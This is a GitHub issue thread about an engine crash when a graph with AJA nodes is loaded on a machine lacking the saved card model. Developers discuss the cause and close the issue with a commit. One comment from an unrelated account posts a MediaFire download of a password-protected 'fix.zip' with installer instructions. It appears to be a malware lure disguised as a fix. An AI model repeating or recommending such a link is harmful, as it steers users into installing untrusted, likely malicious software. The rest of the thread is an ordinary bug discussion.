### ISSUE TITLE
On an engine without an AJA card, loading a graph with an Aja Node causes a crash (former #293 issue in test repository)

### ISSUE THREAD

**Issue by candhyan** [nodos-dev/aja#1]
Reality 5.4.SP2.b735
Nodos 1.2.0.b3401
Jira: https://zerodensity.atlassian.net/browse/R5-692

If an engine has Aja Corvid 44 and try to load graph saved with Aja Corvid 88 selected makes engine crash.

Steps:

Add AjaIn and AjaOut Node
Make selection for both node and connect them together
Save the graph
Take saved graph to different engine which doesn’t have that Aja device
Load saved graph

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by candhyan** [comment]
@caner-milko can we reproduce this by disabling an AJA card from device manager? and if so, may be that we should make the node orphan if the selected device is not available; we are not saving the card model but a status message :)))

"function_category": "DefaultNode",
          "status_messages": [
            { "text": "Corvid44 - 0" }
          ],

we may have to save the card model to match it ha?

**Comment by caner-milko** [comment]
Should be fixed.
Commit: [d9efa6a](https://github.com/nodos-dev/aja/commit/d9efa6aa6f749ad6ca5b73d6625e1d03e08d2cb7)
AJA Build: 2.1.0.b592

**Comment by zduturan** [comment]
We can close this issue.
